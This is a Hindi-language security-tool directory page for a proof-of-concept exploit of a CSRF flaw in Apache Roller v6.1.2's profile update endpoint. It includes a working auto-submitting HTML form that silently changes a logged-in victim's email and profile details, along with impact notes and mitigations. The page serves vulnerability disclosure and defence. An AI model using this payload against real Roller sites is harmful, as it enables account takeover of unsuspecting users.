Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
roller-csrf — Apache Roller v6.1.2 प्रोफ़ाइल अपडेट एंडपॉइंट में CSRF भेद्यता के लिए PoC एक्सप्लॉइट। अनधिकृत प्रोफ़ाइल परिवर्तनों को प्रदर्शित करने के लिए HTML फ़ॉर्म एक्सप्लॉइट कोड शामिल है। | Kitploit
उपकरण/GitHubGitHub/vanlam2001/roller-csrf
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubvanlam2001/roller-csrf

roller-csrf

Apache Roller v6.1.2 प्रोफ़ाइल अपडेट एंडपॉइंट में CSRF भेद्यता के लिए PoC एक्सप्लॉइट। अनधिकृत प्रोफ़ाइल परिवर्तनों को प्रदर्शित करने के लिए HTML फ़ॉर्म एक्सप्लॉइट कोड शामिल है।

रिपॉजिटरी देखें
9 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Apache Roller v6.1.2 - प्रोफ़ाइल अपडेट में क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF)

भेद्यता विवरण

  • संस्करण: v6.1.2
  • दिनांक: 2025-11-09
  • एक्सप्लॉइट लेखक: Van Lam Nguyen
  • फेसबुक: https://www.facebook.com/vanlam1412
  • विक्रेता होमपेज: https://roller.apache.org
  • सॉफ़्टवेयर लिंक: https://github.com/apache/roller/archive/refs/tags/roller-6.1.2.zip
  • परीक्षण किया गया: Windows
  • CVE: N/A
  • डेमो: https://youtu.be/iPEiVzcpJJU

अवलोकन

Roller v6.1.2 और उससे निचले संस्करणों में एंडपॉइंट /roller/roller-ui/profile!save.rol पर क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता पाई गई है।

यह भेद्यता हमलावरों को एक क्राफ्टेड HTML पेज के माध्यम से पीड़ित उपयोगकर्ता की प्रोफ़ाइल जानकारी (जैसे, ईमेल, पूरा नाम, लोकेल, टाइमज़ोन) को मनमाने ढंग से अपडेट करने की अनुमति देती है।

प्रूफ ऑफ कॉन्सेप्ट

यह भेद्यता CSRF सुरक्षा के बिना उपयोगकर्ता की प्रोफ़ाइल को अपडेट करने वाले /roller/roller-ui/profile!save.rol पर अनधिकृत अनुरोधों की अनुमति देती है।

HTML एक्सप्लॉइट कोड

root@kitploit:~
<html>
<head>
    <form id="exploitForm" action="http://localhost:8080/roller/roller-ui/profile!save.rol" method="POST">
        <input name="bean.userName" value="vanlam" type="hidden">
        <input name="bean.screenName" value="hacked" type="hidden">
        <input name="bean.fullName" value="hacked" type="hidden">
        <input name="bean.emailAddress" value="[email protected]" type="hidden">
        <input name="bean.passwordText" value="" type="hidden">
        <input name="bean.passwordConfirm" value="" type="hidden">
        <input name="bean.locale" value="vi_VN" type="hidden">
        <input name="bean.timeZone" value="Asia/Bangkok" type="hidden">
    </form>

    <script>
        document.getElementById('exploitForm').submit();
    </script>
</head>
</html>

फ़ॉर्म पैरामीटर

  • bean.userName: vanlam
  • bean.screenName: hacked
  • bean.fullName: hacked
  • bean.emailAddress: [email protected]
  • bean.passwordText: (खाली)
  • bean.passwordConfirm: (खाली)
  • bean.locale: vi_VN
  • bean.timeZone: Asia/Bangkok

प्रभाव

एक हमलावर एक दुर्भावनापूर्ण HTML पेज तैयार कर सकता है, जिसे एक प्रमाणित Roller उपयोगकर्ता द्वारा देखे जाने पर, वह पेज बिना उनकी सहमति के पीड़ित की प्रोफ़ाइल जानकारी को अपडेट करने के लिए एक फ़ॉर्म स्वचालित रूप से सबमिट कर देगा। इससे निम्न समस्याएँ उत्पन्न हो सकती हैं:

  • उपयोगकर्ता प्रोफ़ाइल डेटा में अनधिकृत परिवर्तन
  • ईमेल पता बदले जाने पर संभावित अकाउंट टेकओवर
  • लोकेल और टाइमज़ोन में बदलाव के कारण उपयोगकर्ता अनुभव में व्यवधान

निवारण

  • सभी स्टेट-चेंजिंग अनुरोधों के लिए CSRF टोकन लागू करें
  • Origin और Referer हेडर को मान्य करें
  • SameSite कुकीज़ का उपयोग करें
  • उचित प्रमाणीकरण और प्राधिकरण जाँच लागू करें
टूल डाउनलोड करें